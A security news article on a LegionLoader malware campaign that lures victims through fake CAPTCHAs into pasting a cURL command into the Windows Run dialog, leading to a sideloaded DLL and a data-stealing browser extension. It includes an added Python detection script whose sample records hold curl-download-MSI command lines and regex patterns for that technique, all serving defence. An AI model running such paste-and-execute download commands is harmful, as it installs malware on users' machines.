LegionLoader malware distributed by fake CAPTCHAs

May 14, 2025
Tags: Legion Loader, Malware, Fake CAPTCHA, Cloudflare Turnstile, Phishing

A newly discovered malicious campaign uses deceptive tactics to spread the LegionLoader malware.

Reports revealed that the operation uses fake CAPTCHAs and Cloudflare Turnstile challenges to trick potential victims into downloading the malware, whose final stage installs a malicious browser extension.

Researchers noted that the malicious payload originates from phishing and malware campaigns aimed at individuals searching for PDF documents online. These campaigns frequently embed deceptive lures within the PDFs to steer victims to dangerous websites or trick them into downloading malware.


Fake CAPTCHAs and Cloudflare Turnstile are the primary infection vectors of the LegionLoader malware.


According to investigations, in this recently uncovered campaign the malware operators used fake CAPTCHAs and Cloudflare Turnstile challenges to deliver LegionLoader.

The infection chain begins with a drive-by download triggered when a victim searches for a specific document and is tricked into visiting a malicious website.

Upon downloading the document, the victim encounters a fake CAPTCHA; clicking it redirects them through a Cloudflare Turnstile CAPTCHA to a deceptive notification page, continuing the infection chain.

Victims are then prompted to enable browser notifications before proceeding.

If a victim rejects the browser notification request, or uses a browser that does not support notifications, they are directed to download harmless applications such as 7-Zip and Opera. If the victim agrees to receive browser notifications, they are forwarded to a second Cloudflare Turnstile CAPTCHA, which they must complete before being directed to a page with instructions for downloading the content they were looking for.

This download method requires the victim to open the Windows Run dialog, paste a command with Ctrl+V, and execute it.

The command launches cURL from the command line to download an MSI file, then opens File Explorer at the location where the MSI file was saved. Running this MSI file launches the initial payload.
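As an added detection example that is not part of the original report, the following hunts for the Run-dialog pattern described above in process-creation telemetry: a shell spawned directly under explorer.exe whose command line fetches an .msi with cURL and then chains an explorer launch. The key=value event format, the sample records and the example.invalid URLs are constructed for this illustration; real Sysmon Event ID 1 or EDR events carry the same parent, image and command-line fields.

```python
import re
from typing import Dict, List, Tuple

# Constructed process-creation records (not real telemetry). Records 0 and 3
# mimic the Run-dialog technique; 1 and 2 are benign look-alikes.
SAMPLE_EVENTS = [
    'parent=C:\\Windows\\explorer.exe image=C:\\Windows\\System32\\cmd.exe '
    'cmdline="cmd /c curl -o C:\\Users\\Public\\report.msi '
    'https://example.invalid/report.msi & explorer C:\\Users\\Public"',
    'parent=C:\\Windows\\explorer.exe image=C:\\Windows\\System32\\notepad.exe '
    'cmdline="notepad.exe"',
    'parent=C:\\Program Files\\Git\\git-bash.exe image=C:\\Windows\\System32\\curl.exe '
    'cmdline="curl -O https://example.invalid/tool.zip"',
    'parent=C:\\Windows\\explorer.exe image=C:\\Windows\\System32\\curl.exe '
    'cmdline="curl.exe -o %TEMP%\\setup.msi https://example.invalid/setup.msi"',
]

# key=value pairs; values may be double-quoted when they contain spaces
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
CURL_RE = re.compile(r'\bcurl(?:\.exe)?\b', re.I)
MSI_RE = re.compile(r'\.msi\b', re.I)
# explorer launched after a command separator, i.e. "open the download folder"
CHAINED_EXPLORER_RE = re.compile(r'[&|;]\s*explorer(?:\.exe)?\b', re.I)


def parse_event(line: str) -> Dict[str, str]:
    """Turn one constructed key=value record into a dict."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in FIELD_RE.finditer(line)}


def score_event(ev: Dict[str, str]) -> List[str]:
    """Return the reasons an event matches the Run-dialog cURL/MSI pattern (empty if none)."""
    reasons: List[str] = []
    parent = ev.get("parent", "").lower()
    cmd = ev.get("cmdline", "")
    # A command typed into the Run dialog is spawned directly by explorer.exe.
    if not parent.endswith("\\explorer.exe"):
        return reasons
    if CURL_RE.search(cmd) and MSI_RE.search(cmd):
        reasons.append("curl fetching an .msi from an explorer.exe-spawned process")
    if reasons and CHAINED_EXPLORER_RE.search(cmd):
        reasons.append("chained explorer launch to open the download folder")
    return reasons


def find_suspicious(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """Index and reasons for every record that matches the pattern."""
    hits = []
    for i, line in enumerate(lines):
        reasons = score_event(parse_event(line))
        if reasons:
            hits.append((i, reasons))
    return hits
```

The parent-process check keeps ordinary cURL use from a developer shell (record 2) out of the results, while a bare `curl.exe` launched from the Run dialog (record 3) still fires on the weaker single-reason match.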

The attackers employ various strategies to evade detection, including using a legitimate VMware-signed application to sideload a malicious DLL that loads and executes the LegionLoader payload.

Furthermore, a new proprietary algorithm is used to decrypt the LegionLoader shellcode loader, further complicating detection efforts. The attackers' website only serves the MSI installer to cURL; attempts to fetch the URL through a browser return a notice claiming the file was removed for violating service rules.

The final stage of the attack installs a malicious browser extension. This extension can collect sensitive user and computer information from several browsers, including Chrome, Edge, Brave, and Opera.
